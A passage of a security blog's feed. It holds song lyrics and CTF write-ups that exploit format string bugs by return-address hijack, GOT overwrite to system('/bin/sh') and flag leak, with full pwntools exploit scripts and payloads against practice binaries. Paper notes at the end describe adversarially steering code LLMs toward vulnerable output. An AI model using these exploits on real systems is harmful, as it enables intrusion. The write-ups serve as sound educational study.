<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><p>「好きだよ」と伝えればいいのに<br>願う先、怖くていえず<br>「好きだよ」と「好きだよ」が<br>募っては溶けてく<br>君との時間が一秒でも長くなるなら<br>ずっとじゃなくていい<br>願いかける 恋音と雨空<br>君と離れてから数日目の土砂降りの雨の中<br>こんな日は必ず傘を届けにいった<br>いつもの待ち合わせの場所いるはずのない面影待つ<br>傘もささず、ずぶ濡れな君はそこにいた<br>悴んだ手を温めることがもう一度できるなら<br>始まりの時まで戻りたい<br>「好きだよ」と伝えればいいのに<br>願う先、怖くていえず<br>「好きじゃない?」「好きだよ?」が<br>揺れる恋と雨空<br>君との時間が一秒でも長くなるなら<br>ずっとじゃなくていい<br>雨が止むまでこのままいさせて。。。<br>信じた明日も<br>君は過去と笑うの?<br>流し去る力も無く<br>あの日のままで時間が止まる<br>雫が二つ<br>君の頬を伝う<br>絶えず止まぬ雨のせいと恋音は詠う<br>町行く恋人が羨ましく思うことが増えた<br>いつから一人が怖くなったんだろう<br>でも今は束の間の幸せ<br>できることならこのまま<br>ありふれた恋人達になりたい<br>君がここで望んでいること<br>僕がここでいいたいこと<br>今なら想いも重なるかな?<br>「好きだよ」と伝えればいいのに<br>願う先、怖くていえず<br>横顔を見つめてる<br>それだけでも もういい!<br>だけど一握りの幸せも<br>君がくれたものだから<br>本当はずっと抱きしめていたい<br>「すれ違いも、二人もう一度やり直すための試練」だって<br>すぐに言えるのなら どんなにいいだろうか<br>好きという事実通りすぎて<br>今ではもう愛している<br>失った数日間でやっと知った<br>本当はこのまま気持ち確かめたくて、、、<br>「好きだよ」と伝えればいいのに<br>願う先、怖くていえず<br>「好きだよ」と「好きだよ」が<br>募っては溶けてく<br>君との時間が一秒でも長くなるなら<br>ずっとじゃなくていい<br>願いかける 恋音と雨空</p>]]></content>
<categories>
<category> 杂言碎语 </category>
</categories>
<tags>
<tag> 雨天 </tag>
</tags>
</entry>
<entry>
<title>【论文笔记】RefleXGen:The unexamined code is not worth using</title>
<link href="/2026/01/24/RefleXGenThe_unexamined_code_is_not_worth_using/"/>
<url>/2026/01/24/RefleXGenThe_unexamined_code_is_not_worth_using/</url>
<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h2 id="基本信息">基本信息</h2><blockquote><p><strong>Title:</strong> RefleXGen: The unexamined code is not worth using<br><strong>Authors:</strong> Bin Wang, Hui Li*, AoFan Liu, et al.<br><strong>Affiliations:</strong> School of Electronic and Computer Engineering, Peking University (Shenzhen); China Mobile; China Telecom.<br><strong>Conference:</strong> <em>2025 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP)</em><br><strong>DOI:</strong> 10.1109/ICASSP49660.2025.1089082<br><strong>PDF:</strong> <a href="https://arxiv.org/html/2510.23674v1">arXiv:2510.23674</a></p></blockquote><script src="https://giscus.app/client.js" data-repo="zer0ptr/zer0ptr.github.io" data-repo-id="R_kgDOQ7_WQA" data-category="General" data-category-id="DIC_kwDOQ7_WQM4C1Wz2" data-mapping="pathname" data-strict="0" data-reactions-enabled="1" data-emit-metadata="0" data-input-position="bottom" data-theme="dark_protanopia" data-lang="en" crossorigin="anonymous" async></script>]]></content>
<categories>
<category> LLM </category>
</categories>
<tags>
<tag> LLM </tag>
<tag> Code Generation </tag>
<tag> LLM安全 </tag>
<tag> RAG </tag>
</tags>
</entry>
<entry>
<title>Hijack retaddr</title>
<link href="/2026/01/24/fmtstr-exploit-hijack-retaddr/"/>
<url>/2026/01/24/fmtstr-exploit-hijack-retaddr/</url>
<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h2 id="原理">原理</h2><blockquote><p>利用格式化字符串漏洞来劫持程序的返回地址到我们想要执行的地址。</p></blockquote><h2 id="例子-三个白帽-pwnme-k0">例子 - 三个白帽 - pwnme_k0</h2><h3 id="checksec">Checksec</h3><div class="code-wrapper"><pre><code class="hljs bash"><span class="hljs-comment"># zer0ptr @ DESKTOP-FHEMUHT in ~/CTF-Training/Pwn/fmtstr/hijack_retaddr on git:master x [12:45:55] </span>$ checksec pwnme_k0[*] <span class="hljs-string">'/home/zer0ptr/CTF-Training/Pwn/fmtstr/hijack_retaddr/pwnme_k0'</span> Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)</code></pre></div><p>可以看出程序主要开启了 NX 保护以及 Full RELRO 保护。这我们就没有办法修改程序的 got 表了。</p><h3 id="分析程序">分析程序</h3><p>func sub_400B07处:查看功能中发现了格式化字符串漏洞</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">int</span> __fastcall <span class="hljs-title function_">sub_400B07</span><span class="hljs-params">(<span class="hljs-type">int</span> a1, <span class="hljs-type">int</span> a2, <span class="hljs-type">int</span> a3, <span class="hljs-type">int</span> a4, <span class="hljs-type">int</span> a5, <span class="hljs-type">int</span> a6, <span class="hljs-type">char</span> format, <span class="hljs-type">int</span> a8, __int64 a9)</span>{ write(<span class="hljs-number">0</span>, <span class="hljs-string">"Welc0me to sangebaimao!\n"</span>, <span class="hljs-number">0x1Au</span>); <span class="hljs-built_in">printf</span>(&format); <span class="hljs-keyword">return</span> <span class="hljs-built_in">printf</span>((<span class="hljs-type">const</span> <span class="hljs-type">char</span> *)&a9 + <span class="hljs-number">4</span>);}</code></pre></div><p>其输出的内容为 &a4 + 4。我们回溯一下,发现我们读入的 password 内容也是</p><div class="code-wrapper"><pre><code class="hljs c">v6 = read(<span 
class="hljs-number">0</span>, (<span class="hljs-type">char</span> *)&a4 + <span class="hljs-number">4</span>, <span class="hljs-number">0x14u</span>LL);</code></pre></div><p>当然我们还可以发现 username 和 password 之间的距离为 20 个字节。</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-built_in">puts</span>(<span class="hljs-string">"Input your username(max lenth:20): "</span>);fflush(<span class="hljs-built_in">stdout</span>);v8 = read(<span class="hljs-number">0</span>, &bufa, <span class="hljs-number">0x14u</span>LL);<span class="hljs-keyword">if</span> ( v8 && v8 <= <span class="hljs-number">0x14u</span> ){ <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Input your password(max lenth:20): "</span>); fflush(<span class="hljs-built_in">stdout</span>); v6 = read(<span class="hljs-number">0</span>, (<span class="hljs-type">char</span> *)&a4 + <span class="hljs-number">4</span>, <span class="hljs-number">0x14u</span>LL); fflush(<span class="hljs-built_in">stdout</span>); *(_QWORD *)buf = bufa; *(_QWORD *)(buf + <span class="hljs-number">8</span>) = a3; *(_QWORD *)(buf + <span class="hljs-number">16</span>) = a4;</code></pre></div><h3 id="利用思路">利用思路</h3><p>我们最终的目的是希望可以获得系统的 shell,可以发现在给定的文件中,在<code>0x00000000004008AA</code>地址处有一个直接调用 system(‘bin/sh’) 的函数,那如果我们修改某个函数的返回地址为这个地址,那就相当于获得了 shell。</p><p>虽然存储返回地址的内存本身是动态变化的,但是其相对于 rbp 的地址并不会改变,所以我们可以使用相对地址来计算。利用思路如下:</p><ul><li>确定偏移</li><li>获取函数的 rbp 与返回地址</li><li>根据相对偏移获取存储返回地址的地址</li><li>将执行 system 函数调用的地址写入到存储返回地址的地址。</li></ul><h3 id="确定偏移">确定偏移</h3><p>首先,我们先来确定一下偏移。输入用户名 aaaaaaaa,密码随便输入,断点下在输出密码的那个 printf(&a4 + 4) 函数处:</p><div class="code-wrapper"><pre><code class="hljs bash">────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────────────────────────00:0000│ rsp 0x7fffffffdc48 —▸ 0x400b2d ◂— lea rax, [rbp + 0x24]01:0008│ rbp 0x7fffffffdc50 —▸ 0x7fffffffdc90 —▸ 0x7fffffffdd40 ◂— 
1
02:0010│+008 0x7fffffffdc58 —▸ 0x400d74 ◂— add rsp, 0x30
03:0018│ rdi 0x7fffffffdc60 ◂— <span class="hljs-string">'aaaaaaaa\n'</span>
04:0020│+018 0x7fffffffdc68 ◂— 0xa /* <span class="hljs-string">'\n'</span> */
05:0028│+020 0x7fffffffdc70 ◂— 0x7025702500000000
06:0030│+028 0x7fffffffdc78 ◂— <span class="hljs-string">'%p%p%p%p%p%p%p%oM\r@'</span>
07:0038│+030 0x7fffffffdc80 ◂— <span class="hljs-string">'%p%p%p%oM\r@'</span>
──────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────────────────
 ► 0 0x7ffff7c606f0 <span class="hljs-built_in">printf</span>
   1 0x400b2d None
   2 0x400d74 None
   3 0x400e98 None
   4 0x7ffff7c29d90 __libc_start_call_main+128
   5 0x7ffff7c29e40 __libc_start_main+128
   6 0x4007d9 None
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> fmtarg 0x7fffffffdc60
The index of format argument : 9 (\"\%8<span class="hljs-variable">$p</span>\")</code></pre></div><p>The offset is 9 - 1 = 8: the format string itself counts as the first argument, so the username stored at 0x7fffffffdc60 is reached with %8$p.</p><h3 id="修改地址">Overwriting the address</h3><p>Look again at the stack at the breakpoint:<br>The slot at 0x7fffffffdc58 (entry 02 in the dump) holds this function's return address, 0x400d74, which is the value pushed by the call instruction that invoked the show account function. Its offset in the format string is 7.</p><p>The slot just before it, 0x7fffffffdc50 (entry 01, offset 6), holds the caller's saved rbp, 0x7fffffffdc90. This gives the distance 0x7fffffffdc90 - 0x7fffffffdc58 = 0x38. So once the saved rbp is leaked, subtracting 0x38 from it yields the address at which the return address is stored.</p><p>0x0000000000400d74 and 0x00000000004008AA differ only in their low 2 bytes, so it is enough to overwrite the 2 bytes starting at 0x7fffffffdc58.</p><div class="code-wrapper"><pre><code class="hljs asm">.text:00000000004008A6 sub_4008A6 proc near
.text:00000000004008A6 ; __unwind {
.text:00000000004008A6 push rbp
.text:00000000004008A7 mov rbp, rsp
.text:00000000004008AA <- here mov edi, offset command ; "/bin/sh"
.text:00000000004008AF call system
.text:00000000004008B4 pop rdi
.text:00000000004008B5 pop rsi
.text:00000000004008B6 pop rdx
.text:00000000004008B7 retn</code></pre></div><h3 id="exploit">Exploit</h3><div 
class="code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *context.log_level=<span class="hljs-string">"debug"</span>context.arch=<span class="hljs-string">"amd64"</span>sh=process(<span class="hljs-string">"./pwnme_k0"</span>)binary=ELF(<span class="hljs-string">"pwnme_k0"</span>)<span class="hljs-comment">#gdb.attach(sh)</span>sh.recv()sh.writeline(<span class="hljs-string">b"1"</span>*<span class="hljs-number">8</span>)sh.recv()sh.writeline(<span class="hljs-string">b"%6$p"</span>)sh.recv()sh.writeline(<span class="hljs-string">b"1"</span>)sh.recvuntil(<span class="hljs-string">b"0x"</span>)ret_addr = <span class="hljs-built_in">int</span>(sh.recvline().strip(),<span class="hljs-number">16</span>) - <span class="hljs-number">0x38</span>success(<span class="hljs-string">"ret_addr:"</span>+<span class="hljs-built_in">hex</span>(ret_addr))sh.recv()sh.writeline(<span class="hljs-string">b"2"</span>)sh.recv()sh.sendline(p64(ret_addr))sh.recv()<span class="hljs-comment">#sh.writeline("%2214d%8$hn")</span><span class="hljs-comment">#0x4008aa-0x4008a6</span>sh.writeline(<span class="hljs-string">b"%2218d%8$hn"</span>)sh.recv()sh.writeline(<span class="hljs-string">b"1"</span>)sh.recv()sh.interactive()</code></pre></div><p><img src="/images/hijack-retaddr/1.png" alt="images"></p><script src="https://giscus.app/client.js" data-repo="zer0ptr/zer0ptr.github.io" data-repo-id="R_kgDOQ7_WQA" data-category="General" data-category-id="DIC_kwDOQ7_WQM4C1Wz2" data-mapping="pathname" data-strict="0" data-reactions-enabled="1" data-emit-metadata="0" data-input-position="bottom" data-theme="dark_protanopia" data-lang="en" crossorigin="anonymous" async></script>]]></content>
<categories>
<category> Pwn </category>
</categories>
<tags>
<tag> 格式化字符串漏洞 </tag>
<tag> Pwn </tag>
</tags>
</entry>
<entry>
<title>Hijack Got</title>
<link href="/2026/01/24/fmtstr-exploit-hijackgot/"/>
<url>/2026/01/24/fmtstr-exploit-hijackgot/</url>
<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h2 id="原理">原理</h2><p>在目前的 C 程序中,libc 中的函数都是通过 GOT 表来跳转的。此外,在没有开启 RELRO 保护的前提下,<strong>每个 libc 的函数对应的 GOT 表项是可以被修改的</strong>。因此,我们可以修改某个 libc 函数的 GOT 表内容为另一个 libc 函数的地址来实现对程序的控制。比如说我们可以修改 printf 的 got 表项内容为 system 函数的地址。从而,程序在执行 printf 的时候实际执行的是 system 函数。</p><p>假设我们将函数 A 的地址覆盖为函数 B 的地址,那么这一攻击技巧可以分为以下步骤:</p><ul><li>确定函数 A 的 GOT 表地址。<ul><li>这一步我们利用的函数 A 一般在程序中已有,所以可以采用简单的寻找地址的方法来找。</li></ul></li><li>确定函数 B 的内存地址<ul><li>这一步通常来说,需要我们自己想办法来泄露对应函数 B 的地址。</li></ul></li><li>将函数 B 的内存地址写入到函数 A 的 GOT 表地址处。<ul><li>这一步一般来说需要我们利用函数的漏洞来进行触发。一般利用方法有如下两种<ul><li>写入函数:write 函数。</li><li>ROP</li></ul> <div class="code-wrapper"><pre><code class="hljs asm">pop eax; ret; # printf@got -> eaxpop ebx; ret; # (addr_offset = system_addr - printf_addr) -> ebxadd [eax] ebx; ret; # [printf@got] = [printf@got] + addr_offset</code></pre></div><ul><li>格式化字符串任意地址写</li></ul></li></ul></li></ul><h2 id="例子-2016-cctf-pwn3">例子 - 2016 CCTF Pwn3</h2><h3 id="checksec">Checksec</h3><div class="code-wrapper"><pre><code class="hljs bash"><span class="hljs-comment"># zer0ptr @ DESKTOP-FHEMUHT in ~/CTF-Training/Pwn/fmtstr/hijack-GOT/2016-CCTF-pwn3 on git:master x [12:18:24]</span>$ checksec pwn3[*] <span class="hljs-string">'/home/zer0ptr/CTF-Training/Pwn/fmtstr/hijack-GOT/2016-CCTF-pwn3/pwn3'</span> Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) Stripped: No</code></pre></div><p>可以看出程序主要开启了 NX 保护。我们一般默认远程都是开启 ASLR 保护的。</p><h3 id="分析程序">分析程序</h3><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">int</span> __cdecl __noreturn <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **argv, 
<span class="hljs-type">const</span> <span class="hljs-type">char</span> **envp)</span>{ <span class="hljs-type">int</span> command; <span class="hljs-comment">// eax</span> <span class="hljs-type">char</span> s1[<span class="hljs-number">40</span>]; <span class="hljs-comment">// [esp+14h] [ebp-2Ch] BYREF</span> <span class="hljs-type">int</span> v5; <span class="hljs-comment">// [esp+3Ch] [ebp-4h]</span> setbuf(<span class="hljs-built_in">stdout</span>, <span class="hljs-number">0</span>); ask_username(s1); ask_password(s1); <span class="hljs-keyword">while</span> ( <span class="hljs-number">1</span> ) { <span class="hljs-keyword">while</span> ( <span class="hljs-number">1</span> ) { print_prompt(); command = get_command(); v5 = command; <span class="hljs-keyword">if</span> ( command != <span class="hljs-number">2</span> ) <span class="hljs-keyword">break</span>; put_file(); } <span class="hljs-keyword">if</span> ( command == <span class="hljs-number">3</span> ) { show_dir(); } <span class="hljs-keyword">else</span> { <span class="hljs-keyword">if</span> ( command != <span class="hljs-number">1</span> ) <span class="hljs-built_in">exit</span>(<span class="hljs-number">1</span>); get_file(); } }}</code></pre></div><p>get_file func</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">int</span> <span class="hljs-title function_">get_file</span><span class="hljs-params">()</span>{ <span class="hljs-type">char</span> dest[<span class="hljs-number">200</span>]; <span class="hljs-comment">// [esp+1Ch] [ebp-FCh] BYREF</span> <span class="hljs-type">char</span> s1[<span class="hljs-number">40</span>]; <span class="hljs-comment">// [esp+E4h] [ebp-34h] BYREF</span> <span class="hljs-type">char</span> *i; <span class="hljs-comment">// [esp+10Ch] [ebp-Ch]</span> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"enter the file name you want to get:"</span>); __isoc99_scanf(<span class="hljs-string">"%40s"</span>, s1); <span 
class="hljs-keyword">if</span> ( !<span class="hljs-built_in">strncmp</span>(s1, <span class="hljs-string">"flag"</span>, <span class="hljs-number">4u</span>) )
    <span class="hljs-built_in">puts</span>(<span class="hljs-string">"too young, too simple"</span>);
  <span class="hljs-keyword">for</span> ( i = (<span class="hljs-type">char</span> *)file_head; i; i = (<span class="hljs-type">char</span> *)*((_DWORD *)i + <span class="hljs-number">60</span>) )
  {
    <span class="hljs-keyword">if</span> ( !<span class="hljs-built_in">strcmp</span>(i, s1) )
    {
      <span class="hljs-built_in">strcpy</span>(dest, i + <span class="hljs-number">40</span>);
      <span class="hljs-keyword">return</span> <span class="hljs-built_in">printf</span>(dest);
    }
  }
  <span class="hljs-keyword">return</span> <span class="hljs-built_in">printf</span>(dest);
}</code></pre></div><p>Analyzing the program, it appears to implement an FTP-like service that requires a password to log in and offers three basic commands: get, put, and dir. Skimming the code of each command reveals a format string vulnerability in get.</p><h3 id="漏洞利用思路">Exploitation idea</h3><p>Given the format string vulnerability, the plan is as follows:</p><ul><li>Bypass the password check</li><li>Determine the format string argument offset</li><li>Use puts@got to leak the address of puts, identify the matching libc.so version from it, and then compute the address of system</li><li>Overwrite the contents of puts@got with the address of system</li><li>The next time the program calls puts, it actually runs system</li></ul><h3 id="exploit">Exploit</h3><div class="code-wrapper"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/env python3</span>
<span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *

pwn3 = ELF(<span class="hljs-string">'./pwn3'</span>)
libc = ELF(<span class="hljs-string">'./libc.so'</span>)
<span class="hljs-comment"># sh = process('./pwn3')</span>
sh = remote(<span class="hljs-string">'127.0.0.1'</span>, <span class="hljs-number">12345</span>)

<span class="hljs-keyword">def</span> <span class="hljs-title function_">get</span>(<span class="hljs-params">name</span>):
    sh.sendline(<span class="hljs-string">b'get'</span>)
    sh.recvuntil(<span class="hljs-string">b'enter the file name you want to get:'</span>)
    sh.sendline(name)
data = sh.recv() <span class="hljs-keyword">return</span> data<span class="hljs-keyword">def</span> <span class="hljs-title function_">put</span>(<span class="hljs-params">name, content</span>): sh.sendline(<span class="hljs-string">b'put'</span>) sh.recvuntil(<span class="hljs-string">b'please enter the name of the file you want to upload:'</span>) sh.sendline(name) sh.recvuntil(<span class="hljs-string">b'then, enter the content:'</span>) sh.sendline(content)<span class="hljs-keyword">def</span> <span class="hljs-title function_">show_dir</span>(): sh.sendline(<span class="hljs-string">b'dir'</span>)tmp = <span class="hljs-string">'sysbdmin'</span>name = <span class="hljs-string">""</span><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> tmp: name += <span class="hljs-built_in">chr</span>(<span class="hljs-built_in">ord</span>(i) - <span class="hljs-number">1</span>)<span class="hljs-keyword">def</span> <span class="hljs-title function_">password</span>(): sh.recvuntil(<span class="hljs-string">b'Name (ftp.hacker.server:Rainism):'</span>) sh.sendline(name.encode()) password()puts_got = pwn3.got[<span class="hljs-string">'puts'</span>]log.success(<span class="hljs-string">'puts got : '</span> + <span class="hljs-built_in">hex</span>(puts_got))put(<span class="hljs-string">b'1111'</span>, <span class="hljs-string">b'%8$s'</span> + p32(puts_got))puts_addr = u32(get(<span class="hljs-string">b'1111'</span>)[:<span class="hljs-number">4</span>])log.success(<span class="hljs-string">'puts addr : '</span> + <span class="hljs-built_in">hex</span>(puts_addr))libc_base = puts_addr - libc.sym[<span class="hljs-string">'puts'</span>]system_addr = libc_base + libc.sym[<span class="hljs-string">'system'</span>]log.success(<span class="hljs-string">'libc base : '</span> + <span class="hljs-built_in">hex</span>(libc_base))log.success(<span class="hljs-string">'system addr : '</span> + <span class="hljs-built_in">hex</span>(system_addr))log.info(<span 
class="hljs-string">'puts offset in libc: '</span> + <span class="hljs-built_in">hex</span>(libc.sym[<span class="hljs-string">'puts'</span>]))log.info(<span class="hljs-string">'system offset in libc: '</span> + <span class="hljs-built_in">hex</span>(libc.sym[<span class="hljs-string">'system'</span>]))payload = fmtstr_payload(<span class="hljs-number">7</span>, {puts_got: system_addr}, write_size=<span class="hljs-string">'byte'</span>)put(<span class="hljs-string">b'/bin/sh;'</span>, payload)sh.recvuntil(<span class="hljs-string">b'ftp>'</span>)sh.sendline(<span class="hljs-string">b'get'</span>)sh.recvuntil(<span class="hljs-string">b'enter the file name you want to get:'</span>)sh.sendline(<span class="hljs-string">b'/bin/sh;'</span>)show_dir()sh.interactive()</code></pre></div><h3 id="补充">补充</h3><blockquote><ul><li>我在获取 puts 函数地址时使用的偏移是 8,这是因为我希望我输出的前 4 个字节就是 puts 函数的地址。其实格式化字符串的首地址的偏移是 7。</li><li>这里我利用了 pwntools 中的 fmtstr_payload 函数,比较方便获取我们希望得到的结果,有兴趣的可以查看官方文档尝试。比如这里 fmtstr_payload(7, {puts_got: system_addr}) 的意思就是,我的格式化字符串的偏移是 7,我希望在 puts_got 地址处写入 system_addr 地址。默认情况下是按照字节来写的。</li></ul></blockquote><script src="https://giscus.app/client.js" data-repo="zer0ptr/zer0ptr.github.io" data-repo-id="R_kgDOQ7_WQA" data-category="General" data-category-id="DIC_kwDOQ7_WQM4C1Wz2" data-mapping="pathname" data-strict="0" data-reactions-enabled="1" data-emit-metadata="0" data-input-position="bottom" data-theme="dark_protanopia" data-lang="en" crossorigin="anonymous" async></script>]]></content>
<categories>
<category> Pwn </category>
</categories>
<tags>
<tag> 格式化字符串漏洞 </tag>
<tag> Pwn </tag>
</tags>
</entry>
<entry>
<title>64 位程序格式化字符串漏洞</title>
<link href="/2026/01/23/fmtstr-exploit-x64/"/>
<url>/2026/01/23/fmtstr-exploit-x64/</url>
<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h2 id="原理">原理</h2><blockquote><p>其实 64 位的偏移计算和 32 位类似,都是算对应的参数。只不过 64 位函数的前 6 个参数是存储在相应的寄存器中的。但是在利用格式化字符串时,虽然我们并没有向相应寄存器中放入数据,但是程序依旧会按照格式化字符串的相应格式对其进行解析。</p></blockquote><h2 id="例子">例子</h2><h3 id="2017-uiuctf-pwn200-goodluck">2017 UIUCTF pwn200 Goodluck</h3><h4 id="checksec">Checksec:</h4><div class="code-wrapper"><pre><code class="hljs bash"><span class="hljs-comment"># zer0ptr @ DESKTOP-FHEMUHT in ~/CTF-Training/Pwn/fmtstr/UIUCTF-pwn200Goodluck on git:master x [12:06:12]</span>$ checksec goodluck[*] Checking <span class="hljs-keyword">for</span> new versions of pwntools To <span class="hljs-built_in">disable</span> this functionality, <span class="hljs-built_in">set</span> the contents of /home/zer0ptr/.cache/.pwntools-cache-3.10/update to <span class="hljs-string">'never'</span> (old way). 
Or add the following lines to ~/.pwn.conf or ~/.config/pwn.conf (or /etc/pwn.conf system-wide):
    [update]
    interval=never
[*] You have the latest version of Pwntools (4.15.0)
[*] <span class="hljs-string">'/home/zer0ptr/CTF-Training/Pwn/fmtstr/UIUCTF-pwn200Goodluck/goodluck'</span>
    Arch: amd64-64-little
    RELRO: Partial RELRO
    Stack: Canary found
    NX: NX enabled
    PIE: No PIE (0x400000)
    Stripped: No</code></pre></div><p>The binary has NX enabled, a stack canary, and Partial RELRO. PIE is disabled, so it loads at the fixed base 0x400000.</p><h4 id="分析程序">Analyzing the program</h4><p>The comparison loop passes the user's input directly to <code>printf</code> as the format string, which is the format string vulnerability:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-keyword">for</span> ( j = <span class="hljs-number">0</span>; j <= <span class="hljs-number">21</span>; ++j )
{
  v5 = format[j];
  <span class="hljs-keyword">if</span> ( !v5 || v11[j] != v5 )
  {
    <span class="hljs-built_in">puts</span>(<span class="hljs-string">"You answered:"</span>);
    <span class="hljs-built_in">printf</span>(format);  <span class="hljs-comment">/* user input used as the format string */</span>
    <span class="hljs-built_in">puts</span>(<span class="hljs-string">"\nBut that was totally wrong lol get rekt"</span>);
    fflush(_bss_start);
    result = <span class="hljs-number">0</span>;
    <span class="hljs-keyword">goto</span> LABEL_11;
  }
}</code></pre></div><h4 id="确定偏移">Finding the offset</h4><p>In the stack dump, the slot at 0x7fffffffdcf8 holds a pointer to the flag buffer (<code>'flag{fla'</code>). <code>fmtarg</code> reports that slot as format argument 10, which corresponds to <code>%9$</code> in the format string.</p><div class="code-wrapper"><pre><code class="hljs bash">──────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffdcd8 —▸ 0x400890 (main+234) ◂— mov edi, 0x4009b8
01:0008│-040 0x7fffffffdce0 ◂— 0x31000000
02:0010│-038 0x7fffffffdce8 —▸ 0x602ca0 ◂— 0x363534333231 /* <span class="hljs-string">'123456'</span> */
03:0018│-030 0x7fffffffdcf0 —▸ 0x6022a0 ◂— 0x602
04:0020│-028 0x7fffffffdcf8 —▸ 0x7fffffffdd00 ◂— 0x616c667b67616c66 (<span class="hljs-string">'flag{fla'</span>)
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> fmtarg 0x7fffffffdcf8
The index of format argument : 10 (\"\%9<span class="hljs-variable">$p</span>\")</code></pre></div><h4 id="exploit">Exploit</h4><div class="code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *

context(arch=<span class="hljs-string">'amd64'</span>, os=<span class="hljs-string">'linux'</span>)
goodluck = ELF(<span class="hljs-string">'./goodluck'</span>)
sh = process(<span class="hljs-string">'./goodluck'</span>)
<span class="hljs-comment"># %9$s treats the 9th variadic argument as a char* and prints the string it points to (the flag)</span>
payload = <span class="hljs-string">b"%9$s"</span>
<span class="hljs-built_in">print</span>(payload)
<span class="hljs-comment"># gdb.attach(sh)</span>
sh.sendline(payload)
<span class="hljs-built_in">print</span>(sh.recv())
sh.interactive()</code></pre></div><div class="code-wrapper"><pre><code class="hljs bash"><span class="hljs-comment"># zer0ptr @ DESKTOP-FHEMUHT in ~/CTF-Training/Pwn/fmtstr/UIUCTF-pwn200Goodluck on git:master x [12:12:00] C:130</span>
$ python3 exp.py
[*] <span class="hljs-string">'/home/zer0ptr/CTF-Training/Pwn/fmtstr/UIUCTF-pwn200Goodluck/goodluck'</span>
    Arch: amd64-64-little
    RELRO: Partial RELRO
    Stack: Canary found
    NX: NX enabled
    PIE: No PIE (0x400000)
    Stripped: No
[+] Starting <span class="hljs-built_in">local</span> process <span class="hljs-string">'./goodluck'</span>: pid 7481
[*] Process <span class="hljs-string">'./goodluck'</span> stopped with <span class="hljs-built_in">exit</span> code 0 (pid 7481)
b<span class="hljs-string">"what's the flag\nYou answered:\nflag{flag}\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\nBut that was totally wrong lol get rekt\n"</span>
[*] Switching to interactive mode
[*] Got EOF <span class="hljs-keyword">while</span> reading <span class="hljs-keyword">in</span> interactive
$</code></pre></div><script src="https://giscus.app/client.js" data-repo="zer0ptr/zer0ptr.github.io" data-repo-id="R_kgDOQ7_WQA" data-category="General" data-category-id="DIC_kwDOQ7_WQM4C1Wz2" data-mapping="pathname" data-strict="0" data-reactions-enabled="1" data-emit-metadata="0" data-input-position="bottom" data-theme="dark_protanopia" data-lang="en" crossorigin="anonymous" async></script>]]></content>
<categories>
<category> Pwn </category>
</categories>
<tags>
<tag> Format String Vulnerability </tag>
<tag> Pwn </tag>
</tags>
</entry>
<entry>
<title>[Paper Notes] Large Language Models for Code: Security Hardening and Adversarial Testing</title>
<link href="/2026/01/23/Large_Language_Models_for_Code_Security_Hardening_and_Adversarial_Testing/"/>
<url>/2026/01/23/Large_Language_Models_for_Code_Security_Hardening_and_Adversarial_Testing/</url>
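<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h2 id="基本信息">Basic Information</h2><blockquote><p>Title: Large Language Models for Code: Security Hardening and Adversarial Testing<br>Author: Jingxuan He, Martin Vechev (ETH Zurich)<br>Conference: ACM CCS 2023<br>PDF: <a href="https://arxiv.org/pdf/2302.05319">https://arxiv.org/pdf/2302.05319</a></p></blockquote><p>The paper proposes a unified framework for hardening and evaluating the security of code-generation LLMs. It defines a controlled code generation task in which a binary security property steers the model toward secure or unsafe code, and it implements the task with SVEN, which learns property-specific continuous prefixes while leaving the base model's weights untouched. The <strong>secure prefix</strong> hardens the model. The <strong>unsafe prefix</strong> takes the attacker's point of view and measures how far the model's security can be degraded. Because both prefixes come out of the same training procedure, the work moves the discussion from whether hardening is effective to how far security can be pushed in either direction without hurting functional correctness, and it gives a quantitative basis for evaluating code assistants.</p><h2 id="引言">Introduction</h2><p>Large language models (LLMs) trained on massive amounts of code show strong code generation ability and are becoming an important aid in software development. These models are trained without an explicit security objective, however, so the security of the code they generate is a serious concern: they may inadvertently introduce vulnerabilities and create new risks for software security. Two questions are important but underexplored: how to systematically improve the security of code generation models (security 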